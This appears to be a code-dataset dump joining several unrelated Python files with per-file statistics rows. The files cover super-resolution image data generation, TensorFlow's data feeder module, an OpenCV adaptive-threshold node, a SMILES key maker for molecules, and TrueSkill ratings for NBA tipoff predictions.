parser.add_argument('--cleanup_factor', default=2, type=int, help='downscaling factor for image cleanup')
parser.add_argument('--upscale_factor', default=4, type=int, choices=[4], help='super resolution upscale factor')
opt = parser.parse_args()
# loader 报错修复 https://blog.csdn.net/qq_34495095/article/details/120905179
# d1=yaml.load(file,Loader=yaml.FullLoader)
# d1=yaml.safe_load(file)
# d1 = yaml.load(file, Loader=yaml.CLoader)
# define input and target directories
with open('paths_test.yml', 'r') as stream:
PATHS = yaml.load(stream,Loader=yaml.FullLoader)
if opt.dataset == 'df2k':
path_sdsr = PATHS['datasets']['df2k'] + '/generated/sdsr/'
path_tdsr = PATHS['datasets']['df2k'] + '/generated/tdsr/'
input_source_dir = PATHS['df2k']['tdsr']['source']
input_target_dir = PATHS['df2k']['tdsr']['target']
source_files = [os.path.join(input_source_dir, x) for x in os.listdir(input_source_dir) if utils.is_image_file(x)]
target_files = [os.path.join(input_target_dir, x) for x in os.listdir(input_target_dir) if utils.is_image_file(x)]
else:
path_sdsr = PATHS['datasets'][opt.dataset] + '/generated/' + opt.artifacts + '/' + opt.track + opt.name + '_sdsr/'
path_tdsr = PATHS['datasets'][opt.dataset] + '/generated/' + opt.artifacts + '/' + opt.track + opt.name + '_tdsr/'
input_source_dir = PATHS[opt.dataset][opt.artifacts]['hr'][opt.track]
input_target_dir = None
source_files = [os.path.join(input_source_dir, x) for x in os.listdir(input_source_dir) if utils.is_image_file(x)]
target_files = []
tdsr_hr_dir = path_tdsr + 'HR'
tdsr_lr_dir = path_tdsr + 'LR'
assert os.path.exists(PATHS['datasets'][opt.dataset])
if not os.path.exists(tdsr_hr_dir):
os.makedirs(tdsr_hr_dir)
if not os.path.exists(tdsr_lr_dir):
os.makedirs(tdsr_lr_dir)
# generate the noisy images
with torch.no_grad():
for file in tqdm(source_files, desc='Generating images from source'):
# load HR image
input_img = Image.open(file)
input_img = TF.to_tensor(input_img)
# Resize HR image to clean it up and make sure it can be resized again
resize2_img = utils.imresize(input_img, 1.0 / opt.cleanup_factor, True)
_, w, h = resize2_img.size()
w = w - w % opt.upscale_factor
h = h - h % opt.upscale_factor
resize2_cut_img = resize2_img[:, :w, :h]
# Save resize2_cut_img as HR image for TDSR
path = os.path.join(tdsr_hr_dir, os.path.basename(file))
TF.to_pil_image(resize2_cut_img).save(path, 'PNG')
# Generate resize3_cut_img and apply model
resize3_cut_img = utils.imresize(resize2_cut_img, 1.0 / opt.upscale_factor, True)
# Save resize3_cut_noisy_img as LR image for TDSR
path = os.path.join(tdsr_lr_dir, os.path.basename(file))
TF.to_pil_image(resize3_cut_img).save(path, 'PNG')
for file in tqdm(target_files, desc='Generating images from target'):
# load HR image
input_img = Image.open(file)
input_img = TF.to_tensor(input_img)
# Save input_img as HR image for TDSR
path = os.path.join(tdsr_hr_dir, os.path.basename(file))
TF.to_pil_image(input_img).save(path, 'PNG')
# generate resized version of input_img
resize_img = utils.imresize(input_img, 1.0 / opt.upscale_factor, True)
# Save resize_noisy_img as LR image for TDSR
path = os.path.join(tdsr_lr_dir, os.path.basename(file))
TF.to_pil_image(resize_img).save(path, 'PNG')
| 45.28125 | 118 | 0.703474 |
acfb6b48a9b1a181d731d5fa486e67d3048a28f8 | 20,420 | py | Python | tensorflow/contrib/learn/python/learn/io/data_feeder.py | cedias/tensorflow | ede4b4c111ebd2b96703dce42f0f7c5f2173f0e7 | [
"Apache-2.0"
] | 2 | 2017-06-29T11:50:27.000Z | 2019-10-15T18:55:28.000Z | tensorflow/contrib/learn/python/learn/io/data_feeder.py | cedias/tensorflow | ede4b4c111ebd2b96703dce42f0f7c5f2173f0e7 | [
"Apache-2.0"
] | null | null | null | tensorflow/contrib/learn/python/learn/io/data_feeder.py | cedias/tensorflow | ede4b4c111ebd2b96703dce42f0f7c5f2173f0e7 | [
"Apache-2.0"
] | 8 | 2017-04-17T23:39:12.000Z | 2019-05-11T14:06:31.000Z | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Implementations of different data feeders to provide data for TF trainer."""
# TODO(ipolosukhin): Replace this module with feed-dict queue runners & queues.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import math
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
# pylint: disable=g-multiple-import,g-bad-import-order
from .pandas_io import HAS_PANDAS, extract_pandas_data, extract_pandas_matrix, extract_pandas_labels
from .dask_io import HAS_DASK, extract_dask_data, extract_dask_labels
# pylint: enable=g-multiple-import,g-bad-import-order
def _get_in_out_shape(x_shape, y_shape, n_classes, batch_size=None):
"""Returns shape for input and output of the data feeder."""
if batch_size is None:
batch_size = x_shape[0]
elif batch_size <= 0:
raise ValueError('Invalid batch_size %d.' % batch_size)
x_shape = list(x_shape[1:]) if len(x_shape) > 1 else [1]
input_shape = [batch_size] + x_shape
if y_shape is None:
return input_shape, None, batch_size
y_shape = list(y_shape[1:]) if len(y_shape) > 1 else []
# Skip first dimension if it is 1.
if y_shape and y_shape[0] == 1:
y_shape = y_shape[1:]
if n_classes is not None and n_classes > 1:
output_shape = [batch_size] + y_shape + [n_classes]
else:
output_shape = [batch_size] + y_shape
return input_shape, output_shape, batch_size
def _data_type_filter(x, y):
"""Filter data types into acceptable format."""
if HAS_DASK:
x = extract_dask_data(x)
if y is not None:
y = extract_dask_labels(y)
if HAS_PANDAS:
x = extract_pandas_data(x)
if y is not None:
y = extract_pandas_labels(y)
return x, y
def _is_iterable(x):
return hasattr(x, 'next') or hasattr(x, '__next__')
def setup_train_data_feeder(
x, y, n_classes, batch_size=None, shuffle=True, epochs=None):
"""Create data feeder, to sample inputs from dataset.
If `x` and `y` are iterators, use `StreamingDataFeeder`.
Args:
x: numpy, pandas or Dask matrix or iterable.
y: numpy, pandas or Dask array or iterable.
n_classes: number of classes.
batch_size: size to split data into parts. Must be >= 1.
shuffle: Whether to shuffle the inputs.
epochs: Number of epochs to run.
Returns:
DataFeeder object that returns training data.
Raises:
ValueError: if one of `x` and `y` is iterable and the other is not.
"""
x, y = _data_type_filter(x, y)
if HAS_DASK:
# pylint: disable=g-import-not-at-top
import dask.dataframe as dd
if (isinstance(x, (dd.Series, dd.DataFrame)) and
(y is None or isinstance(y, (dd.Series, dd.DataFrame)))):
data_feeder_cls = DaskDataFeeder
else:
data_feeder_cls = DataFeeder
else:
data_feeder_cls = DataFeeder
if _is_iterable(x):
if y is not None and not _is_iterable(y):
raise ValueError('Both x and y should be iterators for '
'streaming learning to work.')
return StreamingDataFeeder(x, y, n_classes, batch_size)
return data_feeder_cls(
x, y, n_classes, batch_size, shuffle=shuffle, epochs=epochs)
def _batch_data(x, batch_size=None):
if (batch_size is not None) and (batch_size <= 0):
raise ValueError('Invalid batch_size %d.' % batch_size)
chunk = []
for data in x:
chunk.append(data)
if (batch_size is not None) and (len(chunk) >= batch_size):
yield np.matrix(chunk)
chunk = []
yield np.matrix(chunk)
def setup_predict_data_feeder(x, batch_size=None):
"""Returns an iterable for feeding into predict step.
Args:
x: numpy, pandas, Dask array or iterable.
batch_size: Size of batches to split data into.
If `None`, returns one batch of full size.
Returns:
List or iterator of parts of data to predict on.
Raises:
ValueError: if `batch_size` <= 0.
"""
if HAS_DASK:
x = extract_dask_data(x)
if HAS_PANDAS:
x = extract_pandas_data(x)
if _is_iterable(x):
return _batch_data(x, batch_size)
if len(x.shape) == 1:
x = np.reshape(x, (-1, 1))
if batch_size is not None:
if batch_size <= 0:
raise ValueError('Invalid batch_size %d.' % batch_size)
n_batches = int(math.ceil(float(len(x)) / batch_size))
return [x[i * batch_size:(i + 1) * batch_size] for i in xrange(n_batches)]
return [x]
def setup_processor_data_feeder(x):
"""Sets up processor iterable.
Args:
x: numpy, pandas or iterable.
Returns:
Iterable of data to process.
"""
if HAS_PANDAS:
x = extract_pandas_matrix(x)
return x
def check_array(array, dtype):
"""Checks array on dtype and converts it if different.
Args:
array: Input array.
dtype: Expected dtype.
Returns:
Original array or converted.
"""
# skip check if array is instance of other classes, e.g. h5py.Dataset
# to avoid copying array and loading whole data into memory
if isinstance(array, (np.ndarray, list)):
array = np.array(array, dtype=dtype, order=None, copy=False)
return array
class DataFeeder(object):
"""Data feeder is an example class to sample data for TF trainer.
Parameters:
x: feature Nd numpy matrix of shape [n_samples, n_features, ...].
y: target vector, either floats for regression or class id for
classification. If matrix, will consider as a sequence
of targets. Can be None for unsupervised setting.
n_classes: number of classes, 0 and 1 are considered regression, None will
pass through the input labels without one-hot conversion.
batch_size: mini batch size to accumulate.
random_state: numpy RandomState object to reproduce sampling.
Attributes:
x: input features.
y: input target.
n_classes: number of classes (if None, pass through indices without
one-hot conversion).
batch_size: mini batch size to accumulate.
input_shape: shape of the input.
output_shape: shape of the output.
input_dtype: dtype of input.
output_dtype: dtype of output.
"""
def __init__(
self, x, y, n_classes, batch_size=None, shuffle=True, random_state=None,
epochs=None):
x_dtype = np.int64 if x.dtype == np.int64 else np.float32
y_dtype = (
np.int64 if n_classes is not None and n_classes > 1 else np.float32)
self.x = check_array(x, dtype=x_dtype)
# self.n_classes is None means we're passing in raw target indices
if n_classes is not None:
self.y = (None if y is None else check_array(y, dtype=y_dtype))
else:
self.y = y
if isinstance(self.y, list):
self.y = np.array(y)
self.n_classes = n_classes
self.max_epochs = epochs
self.input_shape, self.output_shape, self._batch_size = _get_in_out_shape(
self.x.shape, None if self.y is None else self.y.shape, n_classes,
batch_size)
# Input dtype matches dtype of x.
self.input_dtype = x_dtype
# self.n_classes is None means we're passing in raw target indices
if n_classes is not None or y is None:
self.output_dtype = np.float32
else:
self.output_dtype = self.y.dtype
self.shuffle = shuffle
self.random_state = np.random.RandomState(
42) if random_state is None else random_state
if self.shuffle:
self.indices = self.random_state.permutation(self.x.shape[0])
else:
self.indices = np.array(range(self.x.shape[0]))
self.offset = 0
self.epoch = 0
self._epoch_placeholder = None
@property
def batch_size(self):
return self._batch_size
def make_epoch_variable(self):
"""Adds a placeholder variable for the epoch to the graph.
Returns:
The epoch placeholder.
"""
self._epoch_placeholder = array_ops.placeholder(dtypes.int32, [1],
name='epoch')
return self._epoch_placeholder
def input_builder(self):
"""Builds inputs in the graph.
Returns:
Two placeholders for inputs and outputs.
"""
input_shape = [None] + self.input_shape[1:]
self._input_placeholder = array_ops.placeholder(
dtypes.as_dtype(self.input_dtype),
input_shape,
name='input')
if self.output_shape is None:
self._output_placeholder = None
else:
output_shape = [None] + self.output_shape[1:]
self._output_placeholder = array_ops.placeholder(
dtypes.as_dtype(self.output_dtype),
output_shape,
name='output')
return self._input_placeholder, self._output_placeholder
def set_placeholders(self, input_placeholder, output_placeholder):
"""Sets placeholders for this data feeder.
Args:
input_placeholder: Placeholder for `x` variable. Should match shape
of the examples in the x dataset.
output_placeholder: Placeholder for `y` variable. Should match
shape of the examples in the y dataset. Can be None.
"""
self._input_placeholder = input_placeholder
self._output_placeholder = output_placeholder
def get_feed_params(self):
"""Function returns a dict with data feed params while training.
Returns:
A dict with data feed params while training.
"""
return {
'epoch': self.epoch,
'offset': self.offset,
'batch_size': self._batch_size
}
def get_feed_dict_fn(self):
"""Returns a function that samples data into given placeholders.
Returns:
A function that when called samples a random subset of batch size
from x and y.
"""
def _feed_dict_fn():
"""Function that samples data into given placeholders."""
if self.max_epochs is not None and self.epoch + 1 > self.max_epochs:
raise StopIteration
assert self._input_placeholder is not None
feed_dict = {}
if self._epoch_placeholder is not None:
feed_dict[self._epoch_placeholder.name] = [self.epoch]
# Take next batch of indices.
end = min(self.x.shape[0], self.offset + self._batch_size)
batch_indices = self.indices[self.offset:end]
# Assign input features from random indices.
inp = (
np.array(self.x[batch_indices]).reshape((batch_indices.shape[0], 1))
if len(self.x.shape) == 1 else self.x[batch_indices])
feed_dict[self._input_placeholder.name] = inp
# move offset and reset it if necessary
self.offset += self._batch_size
if self.offset >= self.x.shape[0]:
self.indices = self.random_state.permutation(self.x.shape[0])
self.offset = 0
self.epoch += 1
# return early if there are no labels
if self._output_placeholder is None:
return feed_dict
# assign labels from random indices
self.output_shape[0] = batch_indices.shape[0]
out = np.zeros(self.output_shape, dtype=self.output_dtype)
for i in xrange(out.shape[0]):
sample = batch_indices[i]
# self.n_classes is None means we're passing in raw target indices
if self.n_classes is None:
out[i] = self.y[sample]
else:
if self.n_classes > 1:
if len(self.output_shape) == 2:
out.itemset((i, self.y[sample]), 1.0)
else:
for idx, value in enumerate(self.y[sample]):
out.itemset(tuple([i, idx, value]), 1.0)
else:
out[i] = self.y[sample]
feed_dict[self._output_placeholder.name] = out
return feed_dict
return _feed_dict_fn
class StreamingDataFeeder(DataFeeder):
"""Data feeder for TF trainer that reads data from iterator.
Streaming data feeder allows to read data as it comes it from disk or
somewhere else. It's custom to have this iterators rotate infinetly over
the dataset, to allow control of how much to learn on the trainer side.
Parameters:
x: iterator that returns for each element, returns features.
y: iterator that returns for each element, returns 1 or many classes /
regression values.
n_classes: indicator of how many classes the target has.
batch_size: Mini batch size to accumulate.
Attributes:
x: input features.
y: input target.
n_classes: number of classes.
batch_size: mini batch size to accumulate.
input_shape: shape of the input.
output_shape: shape of the output.
input_dtype: dtype of input.
output_dtype: dtype of output.
"""
def __init__(self, x, y, n_classes, batch_size):
# pylint: disable=invalid-name,super-init-not-called
x_first_el = six.next(x)
self.x = itertools.chain([x_first_el], x)
if y is not None:
y_first_el = six.next(y)
self.y = itertools.chain([y_first_el], y)
else:
y_first_el = None
self.y = None
self.n_classes = n_classes
self.input_shape, self.output_shape, self._batch_size = _get_in_out_shape(
[1] + list(x_first_el.shape),
[1] + list(y_first_el.shape) if y is not None else None,
n_classes,
batch_size)
self.input_dtype = x_first_el.dtype
# Convert float64 to float32, as all the parameters in the model are
# floats32 and there is a lot of benefits in using it in NNs.
if self.input_dtype == np.float64:
self.input_dtype = np.float32
# Output types are floats, due to both softmaxes and regression req.
if n_classes is not None and n_classes > 0:
self.output_dtype = np.float32
elif y is not None:
if isinstance(y_first_el, list) or isinstance(y_first_el, np.ndarray):
self.output_dtype = np.dtype(type(y_first_el[0]))
else:
self.output_dtype = np.dtype(type(y_first_el))
def get_feed_params(self):
"""Function returns a dict with data feed params while training.
Returns:
A dict with data feed params while training.
"""
return {'batch_size': self._batch_size}
def get_feed_dict_fn(self):
"""Returns a function, that will sample data and provide it to placeholders.
Returns:
A function that when called samples a random subset of batch size
from x and y.
"""
self.stopped = False
def _feed_dict_fn():
"""Samples data and provides it to placeholders.
Returns:
Dict of input and output tensors.
"""
if self.stopped:
raise StopIteration
inp = np.zeros(self.input_shape, dtype=self.input_dtype)
if self.y is not None:
out = np.zeros(self.output_shape, dtype=self.output_dtype)
for i in xrange(self._batch_size):
# Add handling when queue ends.
try:
inp[i, :] = six.next(self.x)
except StopIteration:
self.stopped = True
inp = inp[:i, :]
if self.y is not None:
out = out[:i]
break
if self.y is not None:
y = six.next(self.y)
if self.n_classes is not None and self.n_classes > 1:
if len(self.output_shape) == 2:
out.itemset((i, y), 1.0)
else:
for idx, value in enumerate(y):
out.itemset(tuple([i, idx, value]), 1.0)
else:
out[i] = y
if self.y is None:
return {self._input_placeholder.name: inp}
return {self._input_placeholder.name: inp,
self._output_placeholder.name: out}
return _feed_dict_fn
class DaskDataFeeder(object):
"""Data feeder for that reads data from dask.Series and dask.DataFrame.
Numpy arrays can be serialized to disk and it's possible to do random seeks
into them. DaskDataFeeder will remove requirement to have full dataset in the
memory and still do random seeks for sampling of batches.
Parameters:
x: iterator that returns for each element, returns features.
y: iterator that returns for each element, returns 1 or many classes /
regression values.
n_classes: indicator of how many classes the target has.
batch_size: Mini batch size to accumulate.
random_state: random state for RNG. Note that it will mutate so use a
int value for this if you want consistent sized batches.
Attributes:
x: input features.
y: input target.
n_classes: number of classes.
batch_size: mini batch size to accumulate.
input_shape: shape of the input.
output_shape: shape of the output.
input_dtype: dtype of input.
output_dtype: dtype of output.
"""
def __init__(self, x, y, n_classes, batch_size, shuffle=True,
random_state=None, epochs=None):
# pylint: disable=invalid-name,super-init-not-called
import dask.dataframe as dd # pylint: disable=g-import-not-at-top
# TODO(terrytangyuan): check x and y dtypes in dask_io like pandas
self.x = x
self.y = y
# save column names
self.x_columns = list(x.columns)
if isinstance(y.columns[0], str):
self.y_columns = list(y.columns)
else:
# deal with cases where two DFs have overlapped default numeric colnames
self.y_columns = len(self.x_columns) + 1
self.y = self.y.rename(columns={y.columns[0]: self.y_columns})
# TODO(terrytangyuan): deal with unsupervised cases
# combine into a data frame
self.df = dd.multi.concat([self.x, self.y], axis=1)
self.n_classes = n_classes
x_count = x.count().compute()[0]
x_shape = (x_count, len(self.x.columns))
y_shape = (x_count, len(self.y.columns))
# TODO(terrytangyuan): Add support for shuffle and epochs.
self.shuffle = shuffle
self.epochs = epochs
self.input_shape, self.output_shape, self._batch_size = _get_in_out_shape(
x_shape, y_shape, n_classes, batch_size)
self.sample_fraction = self._batch_size / float(x_count)
# TODO(ptucker,ipolosukhin): Remove this?
# TODO(ipolosukhin): remove or restore.
# self.x.dtypes[0], self.y.dtypes[self.y_columns]
self.input_dtype, self.output_dtype = np.float32, np.float32
if random_state is None:
self.random_state = 66
else:
self.random_state = random_state
def get_feed_params(self):
"""Function returns a dict with data feed params while training.
Returns:
A dict with data feed params while training.
"""
return {'batch_size': self._batch_size}
def get_feed_dict_fn(self, input_placeholder, output_placeholder):
"""Returns a function, that will sample data and provide it to placeholders.
Args:
input_placeholder: tf.Placeholder for input features mini batch.
output_placeholder: tf.Placeholder for output targets.
Returns:
A function that when called samples a random subset of batch size
from x and y.
"""
def _feed_dict_fn():
"""Samples data and provides it to placeholders."""
# TODO(ipolosukhin): option for with/without replacement (dev version of
# dask)
sample = self.df.random_split(
[self.sample_fraction, 1 - self.sample_fraction],
random_state=self.random_state)
inp = extract_pandas_matrix(sample[0][self.x_columns].compute()).tolist()
out = extract_pandas_matrix(sample[0][self.y_columns].compute())
# convert to correct dtype
inp = np.array(inp, dtype=self.input_dtype)
# one-hot encode out for each class for cross entropy loss
if HAS_PANDAS:
import pandas as pd # pylint: disable=g-import-not-at-top
if not isinstance(out, pd.Series):
out = out.flatten()
out_max = self.y.max().compute().values[0]
encoded_out = np.zeros((out.size, out_max + 1), dtype=self.output_dtype)
encoded_out[np.arange(out.size), out] = 1
return {input_placeholder.name: inp,
output_placeholder.name: encoded_out}
return _feed_dict_fn
| 34.493243 | 100 | 0.673506 |
acfb6b6d893b6c7d222c49925ba14cae9c546cea | 1,566 | py | Python | packages/OpenCV/nodes/OpenCV___ThresholdAdaptiveMean0/OpenCV___ThresholdAdaptiveMean0___METACODE.py | lidong1266/Ryven-Switch | 68d1f71e81d6564196f44ca49d5903f06db6a4d9 | [
"MIT"
] | 18 | 2021-01-18T09:52:41.000Z | 2022-03-22T10:48:44.000Z | packages/OpenCV/nodes/OpenCV___ThresholdAdaptiveMean0/OpenCV___ThresholdAdaptiveMean0___METACODE.py | xamofb-xsk/Ryven | 8c3dcc613098863ae9fb747e62c0bb9d9eb4cef1 | [
"MIT"
] | null | null | null | packages/OpenCV/nodes/OpenCV___ThresholdAdaptiveMean0/OpenCV___ThresholdAdaptiveMean0___METACODE.py | xamofb-xsk/Ryven | 8c3dcc613098863ae9fb747e62c0bb9d9eb4cef1 | [
"MIT"
] | 3 | 2021-01-18T09:49:42.000Z | 2022-03-22T10:48:47.000Z | from NIENV import *
# API METHODS
# self.main_widget <- access to main widget
# Ports
# self.input(index) <- access to input data
# set_output_val(self, index, val) <- set output data port value
# self.exec_output(index) <- executes an execution output
# self.create_new_input(type_, label, widget_name=None, widget_pos='under', pos=-1)
# self.delete_input(index or input)
# self.create_new_output(type_, label, pos=-1)
# self.delete_output(index or output)
# Logging
# mylog = self.new_log('Example Log')
# mylog.log('I\'m alive!!')
# self.log_message('hello global!', 'global')
# self.log_message('that\'s not good', 'error')
# ------------------------------------------------------------------------------
import cv2
class %CLASS%(NodeInstance):
def __init__(self, params):
super(%CLASS%, self).__init__(params)
# self.special_actions['action name'] = {'method': M(self.action_method)}
# ...
# don't call self.update_event() directly, use self.update() instead
def update_event(self, input_called=-1):
self.image = self.input(0)
grayImage = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)
result = cv2.adaptiveThreshold(grayImage, self.input(1), cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 11, 2)
self.main_widget.show_image(result)
self.set_output_val(0, result)
def get_data(self):
data = {}
# ...
return data
def set_data(self, data):
pass # ...
def remove_event(self):
pass
| 27.964286 | 118 | 0.61175 |
acfb6b81d1729596ded9d2af9fdd52e2be8482b5 | 1,255 | py | Python | src/stk/molecular/key_makers/smiles.py | andrewtarzia/stk | 1ac2ecbb5c9940fe49ce04cbf5603fd7538c475a | [
"MIT"
] | 21 | 2018-04-12T16:25:24.000Z | 2022-02-14T23:05:43.000Z | src/stk/molecular/key_makers/smiles.py | JelfsMaterialsGroup/stk | 0d3e1b0207aa6fa4d4d5ee8dfe3a29561abb08a2 | [
"MIT"
] | 8 | 2019-03-19T12:36:36.000Z | 2020-11-11T12:46:00.000Z | src/stk/molecular/key_makers/smiles.py | supramolecular-toolkit/stk | 0d3e1b0207aa6fa4d4d5ee8dfe3a29561abb08a2 | [
"MIT"
] | 5 | 2018-08-07T13:00:16.000Z | 2021-11-01T00:55:10.000Z | """
SMILES
======
"""
from .molecule import MoleculeKeyMaker
from .utilities import get_smiles
__all__ = (
'Smiles',
)
class Smiles(MoleculeKeyMaker):
"""
Used to get the SMILES of molecules.
Examples:
*Adding SMILES to a Molecule's JSON*
You want to use the isomeric, canonical SMILES from RDKit as
part of a JSON representation of a molecule
.. testcode:: adding-smiles-to-a-molecules-json
import stk
jsonizer = stk.MoleculeJsonizer(
key_makers=(stk.Smiles(), ),
)
# Get the JSON representation, including an SMILES.
json = jsonizer.to_json(stk.BuildingBlock('NCCN'))
.. testcode:: adding-smiles-to-a-molecules-json
:hide:
assert json['molecule']['SMILES'] == 'NCCN'
assert json['matrix']['SMILES'] == 'NCCN'
"""
def __init__(self) -> None:
"""
Initialize a :class:`.Smiles` instance.
"""
MoleculeKeyMaker.__init__(
self=self,
key_name='SMILES',
get_key=get_smiles,
)
def __str__(self) -> str:
return repr(self)
def __repr__(self) -> str:
return 'Smiles()'
| 20.241935 | 68 | 0.555378 |
acfb6bd89e2bf0508499b4010e890971ec5a8907 | 483 | py | Python | tests/function.py | btalebali/pysphere | cda8bbc480f9942911fb8f9c7f3c5c9a4da8bd43 | [
"Unlicense"
] | null | null | null | tests/function.py | btalebali/pysphere | cda8bbc480f9942911fb8f9c7f3c5c9a4da8bd43 | [
"Unlicense"
] | null | null | null | tests/function.py | btalebali/pysphere | cda8bbc480f9942911fb8f9c7f3c5c9a4da8bd43 | [
"Unlicense"
] | null | null | null | import time
import threading
import os
import urllib2
import mmap
import sys, re, getpass, argparse, subprocess
from urlparse import urlparse
from time import sleep
from pysphere import VIServer, MORTypes
from pysphere import VIProperty, VITask,VIException, FaultTypes
from pysphere.vi_virtual_machine import VIVirtualMachine
from pysphere.resources import VimService_services as VI
from pysphere.vi_mor import VIMor
from pysphere import vi_task
from pysphere.ZSI import fault
| 24.15 | 64 | 0.84472 |
acfb6bea34e4f21d414dc262f6f49c3c957210d9 | 5,840 | py | Python | src/skill_algorithms/trueskill_data_processing.py | EllAchE/nba_tipoff | f3820e391d4a6ddb611efeb6c709f16876771684 | [
"MIT"
] | null | null | null | src/skill_algorithms/trueskill_data_processing.py | EllAchE/nba_tipoff | f3820e391d4a6ddb611efeb6c709f16876771684 | [
"MIT"
] | null | null | null | src/skill_algorithms/trueskill_data_processing.py | EllAchE/nba_tipoff | f3820e391d4a6ddb611efeb6c709f16876771684 | [
"MIT"
] | null | null | null | import ENVIRONMENT
from src.database.database_creation import createPlayerTrueSkillDictionary
from src.skill_algorithms.algorithms import trueSkillMatchWithRawNums, trueSkillTipWinProb
from src.skill_algorithms.common_data_processing import beforeMatchPredictions, runAlgoForSeason, runAlgoForAllSeasons
# backlogtodo optimize trueskill, glicko etc. for rapid iteration
# backlogtodo refactor equations here to be generic
def runTrueSkillForSeason(seasonCsv: str, winningBetThreshold: float= ENVIRONMENT.GLICKO_TIPOFF_ODDS_THRESHOLD, startFromBeginning=False):
runAlgoForSeason(seasonCsv, ENVIRONMENT.PLAYER_TRUESKILL_DICT_PATH, ENVIRONMENT.TS_PREDICTION_SUMMARIES_PATH,
trueSkillBeforeMatchPredictions, trueSkillUpdateDataSingleTipoff, winningBetThreshold,
columnAdds=['Home TS Mu', 'Away TS Mu', 'Home TS Sigma', 'Away TS Sigma', 'Home Lifetime Appearances',
'Away Lifetime Appearances', 'Home Tipper Wins', 'Away Tipper Wins', 'Home Tipper Losses', 'Away Tipper Losses'], startFromBeginning=startFromBeginning)
# backlogtodo setup odds prediction to use Ev or win prob rather than bet threshold
def trueSkillBeforeMatchPredictions(psd, homePlayerCode, awayPlayerCode, homeTeam, awayTeam, tipWinnerCode, scoringTeam, predictionArray=None, actualArray=None, histogramPredictionsDict=None,
winningBetThreshold=ENVIRONMENT.TS_TIPOFF_ODDS_THRESHOLD):
return beforeMatchPredictions(psd, homePlayerCode, awayPlayerCode, homeTeam, awayTeam, tipWinnerCode, scoringTeam, predictionArray=predictionArray, actualArray=actualArray, histogramPredictionsDict=histogramPredictionsDict, predictionSummaryPath=ENVIRONMENT.TS_PREDICTION_SUMMARIES_PATH,
minimumTipWinPercentage=winningBetThreshold, predictionFunction=trueSkillTipWinProb, minimumAppearances=ENVIRONMENT.MIN_TS_APPEARANCES)
def runTSForAllSeasons(seasons, winningBetThreshold=ENVIRONMENT.TS_TIPOFF_ODDS_THRESHOLD):
runAlgoForAllSeasons(seasons, ENVIRONMENT.PLAYER_TRUESKILL_DICT_PATH, ENVIRONMENT.TS_PREDICTION_SUMMARIES_PATH, trueSkillBeforeMatchPredictions, trueSkillUpdateDataSingleTipoff,
winningBetThreshold, columnAdds=['Home TS Mu', 'Away TS Mu', 'Home TS Sigma', 'Away TS Sigma', 'Home Lifetime Appearances',
'Away Lifetime Appearances', 'Home Tipper Wins', 'Away Tipper Wins', 'Home Tipper Losses', 'Away Tipper Losses'])
def trueSkillUpdateDataSingleTipoff(psd, winnerCode, loserCode, homePlayerCode, game_code=None):
if game_code:
print(game_code)
winnerCode = winnerCode[11:]
loserCode = loserCode[11:]
winnerOgMu = psd[winnerCode]["mu"]
winnerOgSigma = psd[winnerCode]["sigma"]
loserOgMu = psd[loserCode]["mu"]
loserOgSigma = psd[loserCode]["sigma"]
winnerMu, winnerSigma, loserMu, loserSigma = trueSkillMatchWithRawNums(psd[winnerCode]["mu"], psd[winnerCode]["sigma"], psd[loserCode]['mu'], psd[loserCode]["sigma"])
winnerWinCount = psd[winnerCode]["wins"] + 1
winnerAppearances = psd[winnerCode]["appearances"] + 1
loserLosses = psd[loserCode]["losses"] + 1
loserAppearances = psd[loserCode]["appearances"] + 1
psd[winnerCode]["wins"] = winnerWinCount
psd[winnerCode]["appearances"] = winnerAppearances
psd[loserCode]["losses"] = loserLosses
psd[loserCode]["appearances"] = loserAppearances
psd[winnerCode]["mu"] = winnerMu
psd[winnerCode]["sigma"] = winnerSigma
psd[loserCode]["mu"] = loserMu
psd[loserCode]["sigma"] = loserSigma
print('Winner:', winnerCode, 'trueskill increased', winnerMu - winnerOgMu, 'to', winnerMu, '. Sigma is now', winnerSigma, '. W:', winnerWinCount, 'L', winnerAppearances - winnerWinCount)
print('Loser:', loserCode, 'trueskill decreased', loserMu - loserOgMu, 'to', loserMu, '. Sigma is now', loserSigma, '. W:', loserAppearances - loserLosses, 'L', loserLosses)
# backlogtodo refactor repeated code out of algo methods
if homePlayerCode == winnerCode:
homeMu = winnerOgMu
homeSigma = winnerOgSigma
awayMu = loserOgMu
awaySigma = loserOgSigma
homeAppearances = winnerAppearances - 1
awayAppearances = loserAppearances - 1
homeWins = winnerWinCount - 1
homeLosses = psd[winnerCode]["losses"]
awayWins = psd[loserCode]["wins"]
awayLosses = loserLosses
elif homePlayerCode == loserCode:
homeMu = loserOgMu
homeSigma = loserOgSigma
awayMu = winnerOgMu
awaySigma = winnerOgSigma
awayAppearances = winnerAppearances
homeAppearances = loserAppearances
awayWins = winnerWinCount - 1
awayLosses = psd[winnerCode]["losses"]
homeWins = psd[loserCode]["wins"]
homeLosses = loserLosses
else:
raise ValueError('neither code matches')
return {"Home TS Mu": homeMu, "Home TS Sigma": homeSigma, "Away TS Mu": awayMu, "Away TS Sigma": awaySigma, "Home Lifetime Appearances": homeAppearances, "Away Lifetime Appearances": awayAppearances,
"Home Tipper Wins": homeWins, "Home Tipper Losses": homeLosses, "Away Tipper Wins": awayWins, "Away Tipper Losses": awayLosses}
def calculateTrueSkillDictionaryFromZero():
createPlayerTrueSkillDictionary() # clears the stored values,
runTSForAllSeasons(ENVIRONMENT.ALL_SEASONS_LIST, winningBetThreshold=ENVIRONMENT.TS_TIPOFF_ODDS_THRESHOLD)
print("\n", "trueskill dictionary updated for seasons", ENVIRONMENT.ALL_SEASONS_LIST, "\n")
def updateTrueSkillDictionaryFromLastGame():
runTrueSkillForSeason(ENVIRONMENT.CURRENT_SEASON_CSV, winningBetThreshold=ENVIRONMENT.TS_TIPOFF_ODDS_THRESHOLD, startFromBeginning=False)
